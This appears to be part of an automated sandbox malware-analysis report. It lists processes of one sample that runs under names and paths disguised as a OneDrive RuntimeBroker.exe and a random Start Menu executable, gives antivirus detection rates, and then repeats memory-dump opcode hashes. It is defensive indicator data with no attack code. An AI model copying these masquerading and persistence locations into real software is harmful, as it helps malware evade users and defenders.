                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 66%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:38
                                                                    Start time:21:38:44
                                                                    Start date:05/11/2024
                                                                    Path:C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                                    Imagebase:0xe30000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:39
                                                                    Start time:21:38:52
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                                    Imagebase:0xf40000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 66%, ReversingLabs
                                                                    • Detection: 53%, Virustotal, Browse
                                                                    Has exited:true

                                                                    Target ID:40
                                                                    Start time:21:39:00
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                                    Imagebase:0xed0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false


                                                                      Execution Graph

                                                                      Execution Coverage:6.8%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:3
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 7757 7ffd9bc356c1 7760 7ffd9bc356df QueryFullProcessImageNameA 7757->7760 7759 7ffd9bc35884 7760->7759

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1765259253.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc30000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID: FullImageNameProcessQuery
                                                                      • String ID:
                                                                      • API String ID: 3578328331-0
                                                                      • Opcode ID: 4533afd452fd364b2e2a201170aa962b37c242944f4a261b56a631b46505db41
                                                                      • Instruction ID: a53af62f7de3f0b5d72bde2467268b76fe19a5d0f85aaae8d379ab0a05750866
                                                                      • Opcode Fuzzy Hash: 4533afd452fd364b2e2a201170aa962b37c242944f4a261b56a631b46505db41
                                                                      • Instruction Fuzzy Hash: 4C71AF30618A8D8FDB68DF28C8557F937E1FB59311F04426EE84EC7292CB74A9458B81
                                                                      • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction ID: 45700d14890448792f7a77ee4ad80256f46f31d6e75c6f2da8f924a925832783
                                                                      • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction Fuzzy Hash: F4C04C3455180D9FC958EB69C89591477A0FB1D315BD60090E409C7271E669DDD6C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction ID: 76bd946553c2ef4ebd4a948394b85e23847e7e7cada1b332635ab29511e26127
                                                                      • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction Fuzzy Hash: 61C08CA1E2C20A95EB2496A048291AAB7818F09220F52867280ADA60A5DE2856025280
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 942ae209e2e80192d2633539b94848fafb873516704abb15dcc6d6c989ff633b
                                                                      • Instruction ID: 92901dfa8d2df6fbca080bd6a1f0b68fd094f14cc0f385c49b54a05097a6c1c7
                                                                      • Opcode Fuzzy Hash: 942ae209e2e80192d2633539b94848fafb873516704abb15dcc6d6c989ff633b
                                                                      • Instruction Fuzzy Hash: D7C04C04F1881E56F75A6614543157E48929B44754F9545B4E41DD76CECE1C591202C7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction ID: b3f92d2a2f5a77ba122d8cd4cd5a1a83409582608cc8b965e381d36b81ceda09
                                                                      • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction Fuzzy Hash: 0FB01200E6740F00EC2433FB08520A478405B4C500FC20070D80E40091984D22940242
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1765259253.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc30000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0eb4405634ad8345cd90f8be61f5aef0d3857e79e017d148ec6cd51fb7de7bbb
                                                                      • Instruction ID: cf1eec0d5c486129e1a65d791452822c73c2e681cfc1a03d1388043e3461c488
                                                                      • Opcode Fuzzy Hash: 0eb4405634ad8345cd90f8be61f5aef0d3857e79e017d148ec6cd51fb7de7bbb
                                                                      • Instruction Fuzzy Hash: B5F1A531F0995D5FEBA8FBA894B56BC62D2FFA8300F55017DE00DC32E6DE2869418741
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1765259253.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc30000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bb7fc3d41ed1ad8fe9f363a73a03d203210ca8b3dea78bae87d27b1228b7b35e
                                                                      • Instruction ID: bebd020e80ff3c8126c25bf99f54f3f7a31320dde6ed20a48d855afed098c4a5
                                                                      • Opcode Fuzzy Hash: bb7fc3d41ed1ad8fe9f363a73a03d203210ca8b3dea78bae87d27b1228b7b35e
                                                                      • Instruction Fuzzy Hash: 53617E70A195198FEB58EFA8C8A5ABD73B2FF58304F910539D01ADB2A5CF34A941CB40
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1760043818.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 3886735fd86603637beb1b278350b42675a724268466b44f48847f05933f573d
                                                                      • Instruction ID: bf052793a3fd37f1244b75bb33fdb5bc94ce87890e76dd1f5b135db772e01080
                                                                      • Opcode Fuzzy Hash: 3886735fd86603637beb1b278350b42675a724268466b44f48847f05933f573d
                                                                      • Instruction Fuzzy Hash: 1D41D183B1853685E31F33FC79299ED5B84CF8527DB0842B7E16E8A0C76C88208392E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0a71acaa448d106a6865c803d2a958cf9b7cbe63980d82ff9dc522d0ddc732a
                                                                      • Instruction ID: f0a284d3ac0c7a3b67b5cb09c90aa9642c6cd130a1e42c444ccefd6403ce4172
                                                                      • Opcode Fuzzy Hash: b0a71acaa448d106a6865c803d2a958cf9b7cbe63980d82ff9dc522d0ddc732a
                                                                      • Instruction Fuzzy Hash: FB82D321B1995E4FEBA8FB6884A5BB477D2FFA8300F1541B9D01DC32D6DD28BD828741
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2963a5d2afe7b139efd4a4f642526bca8c363727c8c9b920f1694eba472fdbd2
                                                                      • Instruction ID: 68e2b960691576704317e78d94fc711694e742f520f1d9f0d5f15f67c107ceda
                                                                      • Opcode Fuzzy Hash: 2963a5d2afe7b139efd4a4f642526bca8c363727c8c9b920f1694eba472fdbd2
                                                                      • Instruction Fuzzy Hash: BDB1DD61B2D69A0BE32DAB6C4CD20B473C1EB9A309B55877EC8DBC3457D92CE50782C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9
                                                                      • API String ID: 0-3426396564
                                                                      • Opcode ID: 95bd2d70263fadbb1f5d159e096fe91379546c1da031f0875cf2b402847db7e3
                                                                      • Instruction ID: 68ecfc92bb65c7e1269d229fedc20664105a2c118639b07c7c8855f942d9a511
                                                                      • Opcode Fuzzy Hash: 95bd2d70263fadbb1f5d159e096fe91379546c1da031f0875cf2b402847db7e3
                                                                      • Instruction Fuzzy Hash: C201442772EA6A8FC6016B7DFC506E8BB50EBC613679600FBC245CB5A2E110186FC7D0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: eM_H
                                                                      • API String ID: 0-282742407
                                                                      • Opcode ID: 4f1fe7c759f8d36ae8929a40ebaf05fbf5714a32539b119869067d5f4d1c7008
                                                                      • Instruction ID: 2fcd46ec996ab82edff7d0ce4f0f37dba76b14050349198ebaba1ef2bc13e709
                                                                      • Opcode Fuzzy Hash: 4f1fe7c759f8d36ae8929a40ebaf05fbf5714a32539b119869067d5f4d1c7008
                                                                      • Instruction Fuzzy Hash: D0511631B0CB084FE758DB5CA85A67577D1EB99720F14417EF48EC32A2DA35BC428782
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [
                                                                      • API String ID: 0-784033777
                                                                      • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction ID: ebe96405d0b4b11926bf1887cdb92ebaf3cd62a93d0602a52305c7d25b0faa3b
                                                                      • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction Fuzzy Hash: 60116031A1CB688FDB64DF18C40526AB7E1FB98711F16053ED489E3261CB34B9018B83
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 93ccd9cb12d73481c63e1702b492b7e72fa19dd8c12df88e9a16b04a729d1080
                                                                      • Instruction ID: bb7650356f7d5c5e58d64ea971e03f87f52e82c674cdeed2858ed7e798d392a4
                                                                      • Opcode Fuzzy Hash: 93ccd9cb12d73481c63e1702b492b7e72fa19dd8c12df88e9a16b04a729d1080
                                                                      • Instruction Fuzzy Hash: 7D11BF6150F3C54FDB53A77488689A57FA0EF43611B0A81EFD0C5CF0B3DA69494ACB12
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 2c414676a96ac8991bef3f470e795f35547bdab4ee671542b895c327aebbf579
                                                                      • Instruction ID: 825d34e207d7b75df8fe4d01d6d004ee6a95eeaccaf4bf0af877a17fb57c0459
                                                                      • Opcode Fuzzy Hash: 2c414676a96ac8991bef3f470e795f35547bdab4ee671542b895c327aebbf579
                                                                      • Instruction Fuzzy Hash: 2FE06D2164E3C04FCB16EB3888688557FA0AE6720174A42EEC086CF1A3EA2D8889C711
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 9a3845fec4913bcfa2a1c2dcf1e30361f1467e650845f2075d1ebae0f6f34127
                                                                      • Instruction ID: d4c85a19c988f8ae481850d15cdfad4b3ea28baac6b7a44035ae6bb4b3e4069a
                                                                      • Opcode Fuzzy Hash: 9a3845fec4913bcfa2a1c2dcf1e30361f1467e650845f2075d1ebae0f6f34127
                                                                      • Instruction Fuzzy Hash: 86E06D6164E7C44FCB5AEB748869454BFA0EF6721174A42EFC045CF1A7EA2DC885C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 3e9fc67d7ac4348ac486666174a32f760403b8fba770065871490caea315ebb7
                                                                      • Instruction ID: b4a49f4f1ef1186964d0937bb0e67b9b0c1f0695dcb6b0cfbb6661a39f40ff14
                                                                      • Opcode Fuzzy Hash: 3e9fc67d7ac4348ac486666174a32f760403b8fba770065871490caea315ebb7
                                                                      • Instruction Fuzzy Hash: 04E06D6164E7C44FC71AEA788869854BFA0EF6721174A52EFC045CF1A7EA2D8889C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 2db8c9ac7efa9cdc91341b19b6f968f1edf1b99bd8b104cb944dddec58a07669
                                                                      • Instruction ID: fcaf63145801c42f6afee87650239952ccfd267057284dfa9507a20e85fb12cd
                                                                      • Opcode Fuzzy Hash: 2db8c9ac7efa9cdc91341b19b6f968f1edf1b99bd8b104cb944dddec58a07669
                                                                      • Instruction Fuzzy Hash: CDE0ED6154F3D44FCB16DB7488698557FB0AE6B21074B41DEC185CB1B3D619D949C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 4df0ab70ae7f309628f2faeb7f6dcb5ebb956beb4ff421f67bf74f580f61ea40
                                                                      • Instruction ID: 19cf3b2479bac00445e6717740ed3d6f83370dffcb73bfc4efe64230e81bc516
                                                                      • Opcode Fuzzy Hash: 4df0ab70ae7f309628f2faeb7f6dcb5ebb956beb4ff421f67bf74f580f61ea40
                                                                      • Instruction Fuzzy Hash: A7E01A7154E3C44FCB06AB7488699553FA09E6B21178B41DEC08ACF1B3D62D8949C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 83dc0d97cbbc427e747160c5e42807c5c195f7ff0b624313fe927a8df981d17d
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95a90a4cb7e9b901fa3b5f7eb8dd5f2ebdc6149690c51b9f8f2418de34e328b5
                                                                      • Instruction ID: be2653dae989573074bf913477c8499db98a35f19379fc432810422f359cbcf1
                                                                      • Opcode Fuzzy Hash: 95a90a4cb7e9b901fa3b5f7eb8dd5f2ebdc6149690c51b9f8f2418de34e328b5
                                                                      • Instruction Fuzzy Hash: 72E08C2160AB844FC70EA7288CA99503BB1EFAB21278A40DBC005CB6B3EA1DCC49C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction ID: 7ceed153ac2f168313dbd501c589e6f9ddc9fd4547ae7362bfcf7f6e491dd0a7
                                                                      • Opcode Fuzzy Hash: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction Fuzzy Hash: E8E04F3270D80F96FB75A750C8705BB3692EBD8719B264239C02AD25A1DE6CA7068641
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4fc3ac8c948e3e64e0be3824e0dfcc0c244eb687bbef3ca1b45b1b9a3a3a426a
                                                                      • Instruction ID: 870476d9901eb64a241cd0e486d8eebecf652264aefa4148d55cf23437845e7c
                                                                      • Opcode Fuzzy Hash: 4fc3ac8c948e3e64e0be3824e0dfcc0c244eb687bbef3ca1b45b1b9a3a3a426a
                                                                      • Instruction Fuzzy Hash: 6CF02270518A1C8FCF98EB48C495EE9B7F1FB68305F154599914AE7660CB31AA80CF85
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba736035fa633c8ca825ff0cf86fb36d06e0121df7aab2ba7dc9bf295e1baaf4
                                                                      • Instruction ID: 7d77ad6cb2987bc77775083f8f66ba844faddb3fd44bbf9729ae6690ead2ed18
                                                                      • Opcode Fuzzy Hash: ba736035fa633c8ca825ff0cf86fb36d06e0121df7aab2ba7dc9bf295e1baaf4
                                                                      • Instruction Fuzzy Hash: EBE08C2164A7804FC30E66389CA98543BB1DFAB21278A41DBC041CB6B3EA2ECC89C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction ID: 9f57dabdae326f99f93587561800b524ac45c405cfcda306ebea8823e06024e6
                                                                      • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction Fuzzy Hash: 35E01271F0D11A56FFA4A794D8617F966A0DB58300F1110B8D50ED33D1CD38AF418645
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3c89a02c4191a3142e1c0e985e323deac79fb3db9ccaa47c497b739200f758cd
                                                                      • Instruction ID: 8b8c34f85137e0868dbb20e6eb0981472966af9f90bf3b0b39ec1eae5bb0345f
                                                                      • Opcode Fuzzy Hash: 3c89a02c4191a3142e1c0e985e323deac79fb3db9ccaa47c497b739200f758cd
                                                                      • Instruction Fuzzy Hash: 71E0127054F3C04FCB0AAB7488698543FB0AE6B21078F41EEC08ACF1B3E62D8949C701
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9eec8148cdc11d20ca6e4a29fc37742d57f5518ec323d69221f0075981819f0b
                                                                      • Instruction ID: ebb476e041869fb9b3c971ffe5d6da40b05989d01fad73e43c37698f59567be2
                                                                      • Opcode Fuzzy Hash: 9eec8148cdc11d20ca6e4a29fc37742d57f5518ec323d69221f0075981819f0b
                                                                      • Instruction Fuzzy Hash: 76E01A6594E7C04FC70B9B3488B88547F60DE1721074A40EBC085CF2B3E5298949C711
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c12b24600996daff528c562a0a9ca3c030329e078465264730dea7850f23641e
                                                                      • Instruction ID: 0946180e54041b516ca7189a9017140664d13340f92fc9f56fb5c6a05218d10d
                                                                      • Opcode Fuzzy Hash: c12b24600996daff528c562a0a9ca3c030329e078465264730dea7850f23641e
                                                                      • Instruction Fuzzy Hash: A9E04F6194F7C04FC71BA73488788507FA0DE5721078A40EFC185CF5B3D5199849C712
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c8262d4a635fcdd9bd911250cd8432f4b751a528c8bcc8fa1772dcca1dfffdf9
